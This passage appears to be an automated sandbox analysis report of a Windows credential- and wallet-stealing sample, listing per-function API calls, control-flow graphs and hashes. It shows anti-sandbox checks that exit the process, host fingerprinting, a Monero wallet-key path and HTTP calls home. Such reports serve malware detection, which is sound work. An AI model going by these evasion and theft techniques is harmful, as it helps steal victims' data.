                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                                • Instruction ID: 5a177d458226dcc38ccf78542989660d096b988be3e639be12728353077dd10b
                                • Opcode Fuzzy Hash: e41ed01a74290c51a0f4368e2e6b5f01d8b2d10f3cd89c20b1617a096df57c12
                                • Instruction Fuzzy Hash: 2DE16471910505AADB04FBB0DC7ADED7B38BF94301F50822AB90756491FF346A4DCBA6
                                Function 005517A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 5517a0-5517cd call 55aad0 StrCmpCA 1304 5517d7-5517f1 call 55aad0 1301->1304 1305 5517cf-5517d1 ExitProcess 1301->1305 1309 5517f4-5517f8 1304->1309 1310 5519c2-5519cd call 55a800 1309->1310 1311 5517fe-551811 1309->1311 1313 551817-55181a 1311->1313 1314 55199e-5519bd 1311->1314 1316 551835-551844 call 55a820 1313->1316 1317 5518f1-551902 StrCmpCA 1313->1317 1318 551951-551962 StrCmpCA 1313->1318 1319 551970-551981 StrCmpCA 1313->1319 1320 551913-551924 StrCmpCA 1313->1320 1321 551932-551943 StrCmpCA 1313->1321 1322 55185d-55186e StrCmpCA 1313->1322 1323 55187f-551890 StrCmpCA 1313->1323 1324 551821-551830 call 55a820 1313->1324 1325 5518ad-5518be StrCmpCA 1313->1325 1326 5518cf-5518e0 StrCmpCA 1313->1326 1327 55198f-551999 call 55a820 1313->1327 1328 551849-551858 call 55a820 1313->1328 1314->1309 1316->1314 1340 551904-551907 1317->1340 1341 55190e 1317->1341 1346 551964-551967 1318->1346 1347 55196e 1318->1347 1349 551983-551986 1319->1349 1350 55198d 1319->1350 1342 551926-551929 1320->1342 1343 551930 1320->1343 1344 551945-551948 1321->1344 1345 55194f 1321->1345 1332 551870-551873 1322->1332 1333 55187a 1322->1333 1334 551892-55189c 1323->1334 1335 55189e-5518a1 1323->1335 1324->1314 1336 5518c0-5518c3 1325->1336 1337 5518ca 1325->1337 1338 5518e2-5518e5 1326->1338 1339 5518ec 1326->1339 1327->1314 1328->1314 1332->1333 1333->1314 1354 5518a8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1343 1343->1314 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 005517C5
                                • ExitProcess.KERNEL32 ref: 005517D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 86c13492531b0d8d7f01dbed3e0dddc62e5faf5ca8dca7c1d64c6448eb785bf3
                                • Instruction ID: d85e38097c741fbebe5f06197c444625698c5d9e23328fe2931d27114e953cac
                                • Opcode Fuzzy Hash: 86c13492531b0d8d7f01dbed3e0dddc62e5faf5ca8dca7c1d64c6448eb785bf3
                                • Instruction Fuzzy Hash: F4517FB4A00209EFDB04DFA0D964BBE7FB5BF44705F10854EE906A7280D774E949CB66
                                Function 00557500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 557500-55754a GetWindowsDirectoryA 1357 557553-5575c7 GetVolumeInformationA call 558d00 * 3 1356->1357 1358 55754c 1356->1358 1365 5575d8-5575df 1357->1365 1358->1357 1366 5575e1-5575fa call 558d00 1365->1366 1367 5575fc-557617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 557619-557626 call 55a740 1367->1369 1370 557628-557658 wsprintfA call 55a740 1367->1370 1377 55767e-55768e 1369->1377 1370->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00557542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0055757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0055760A
                                • wsprintfA.USER32 ref: 00557640
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\$V
                                • API String ID: 1544550907-271220574
                                • Opcode ID: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                                • Instruction ID: 871dd97918fa2740fbfea29058f5f3ac6086560c7843153b6e4e508ef4be1c59
                                • Opcode Fuzzy Hash: 26ff5460a84d413c1595d657936f6309bcbc4312de9b5cdd95b3cfcb412a078e
                                • Instruction Fuzzy Hash: CA4194B1D04248ABDF10DF94DC59BEEBBB8FF48701F10419AF90567280E7786A48CBA5
                                Function 005569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01073230), ref: 005598A1
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,010733B0), ref: 005598BA
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01073308), ref: 005598D2
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,010732A8), ref: 005598EA
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,010731B8), ref: 00559903
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01079F48), ref: 0055991B
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01065850), ref: 00559933
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01065970), ref: 0055994C
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01073320), ref: 00559964
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01073248), ref: 0055997C
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01073338), ref: 00559995
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01073158), ref: 005599AD
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,01065930), ref: 005599C5
                                  • Part of subcall function 00559860: GetProcAddress.KERNEL32(74DD0000,010731A0), ref: 005599DE
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 005411D0: ExitProcess.KERNEL32 ref: 00541211
                                  • Part of subcall function 00541160: GetSystemInfo.KERNEL32(?), ref: 0054116A
                                  • Part of subcall function 00541160: ExitProcess.KERNEL32 ref: 0054117E
                                  • Part of subcall function 00541110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                                  • Part of subcall function 00541110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                                  • Part of subcall function 00541110: ExitProcess.KERNEL32 ref: 00541143
                                  • Part of subcall function 00541220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                                  • Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541258
                                  • Part of subcall function 00541220: __aulldiv.LIBCMT ref: 00541266
                                  • Part of subcall function 00541220: ExitProcess.KERNEL32 ref: 00541294
                                  • Part of subcall function 00556770: GetUserDefaultLangID.KERNEL32 ref: 00556774
                                  • Part of subcall function 00541190: ExitProcess.KERNEL32 ref: 005411C6
                                  • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                                  • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                                  • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                                  • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                                  • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                                  • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01079EA8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                                • Sleep.KERNEL32(00001770), ref: 00556B04
                                • CloseHandle.KERNEL32(?,00000000,?,01079EA8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                                • ExitProcess.KERNEL32 ref: 00556B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                                • Instruction ID: 6497a6133172337643a503fd40492882b901ac90d3a50e916afcc4b435b2b13e
                                • Opcode Fuzzy Hash: ee31ebacbe12b21e15ead2ff66a29d79a58cccfe7cbf1165183fd3dd5321d53a
                                • Instruction Fuzzy Hash: EE31527094010AAADB04F7F0DC6EBEE7F78BF84342F50461AF902A2181EF746509C7A6
                                Function 00541220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 541220-541247 call 5589b0 GlobalMemoryStatusEx 1439 541273-54127a 1436->1439 1440 541249-541271 call 55da00 * 2 1436->1440 1442 541281-541285 1439->1442 1440->1442 1444 541287 1442->1444 1445 54129a-54129d 1442->1445 1447 541292-541294 ExitProcess 1444->1447 1448 541289-541290 1444->1448 1448->1445 1448->1447
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0054123E
                                • __aulldiv.LIBCMT ref: 00541258
                                • __aulldiv.LIBCMT ref: 00541266
                                • ExitProcess.KERNEL32 ref: 00541294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                                • Instruction ID: 0dbb06116785e83c430c4a204ab77aa88386feadc157b5320cfcc0780325ca52
                                • Opcode Fuzzy Hash: d7a94ff1089fab9bf71f33020f49826d798f3cf639e3fa191a2b1fde50c1688e
                                • Instruction Fuzzy Hash: 20014FB0948308BAEB10DBD0CC49B9EBB78BB44705F208055E705F6180D7B46585875D
                                Function 00556AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1450 556af3 1451 556b0a 1450->1451 1453 556b0c-556b22 call 556920 call 555b10 CloseHandle ExitProcess 1451->1453 1454 556aba-556ad7 call 55aad0 OpenEventA 1451->1454 1460 556af5-556b04 CloseHandle Sleep 1454->1460 1461 556ad9-556af1 call 55aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01079EA8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00556AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00556AF9
                                • Sleep.KERNEL32(00001770), ref: 00556B04
                                • CloseHandle.KERNEL32(?,00000000,?,01079EA8,?,0056110C,?,00000000,?,00561110,?,00000000,00560AEF), ref: 00556B1A
                                • ExitProcess.KERNEL32 ref: 00556B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                                • Instruction ID: 6832f25de47d9b0ab20a7ceae4a5ab06024d8dad58e542e5f6e24febdfe2fbd0
                                • Opcode Fuzzy Hash: 980c89da855e609f6d97e4fae87f73c3a86a99fd69b6214c0f77b7a6cf9906cc
                                • Instruction Fuzzy Hash: 4FF0307094024AAAF700ABA0DC2AB7D7E74FB04712F608917BD03A2191DBB46548D656
                                Function 005447B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 12649e7ca3152dfbebc2f6e77d3d2857c289d79e73e82e87181b562155011dbb
                                • Instruction ID: ee94cda01f05d68dc161982bc6c661cd6f835dc62093f19bcd7826e5df326c12
                                • Opcode Fuzzy Hash: 12649e7ca3152dfbebc2f6e77d3d2857c289d79e73e82e87181b562155011dbb
                                • Instruction Fuzzy Hash: AE214FB1D00209ABDF14DFA4E849ADE7B75FB44320F108626F919A72C1EB706A09CF81
                                Function 005551F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                                  • Part of subcall function 00546280: InternetOpenA.WININET(00560DFE,00000001,00000000,00000000,00000000), ref: 005462E1
                                  • Part of subcall function 00546280: StrCmpCA.SHLWAPI(?,0107F608), ref: 00546303
                                  • Part of subcall function 00546280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00546335
                                  • Part of subcall function 00546280: HttpOpenRequestA.WININET(00000000,GET,?,0107EFB8,00000000,00000000,00400100,00000000), ref: 00546385
                                  • Part of subcall function 00546280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 005463BF
                                  • Part of subcall function 00546280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 005463D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00555228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                                • Instruction ID: e6d16ada3ff708b3ce11cb7c9bdf117ce77cad8381cca31ccfdf90c49b6b87bf
                                • Opcode Fuzzy Hash: 19784a9c71f0d25c334ef09e331ec787069afbe9b5c5370a57611118c9641a20
                                • Instruction Fuzzy Hash: 03111F30910449A7CB14FF70DD6AAED7B38BF90301F408655FC1A46592EF306B09CB91
                                Function 005578E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
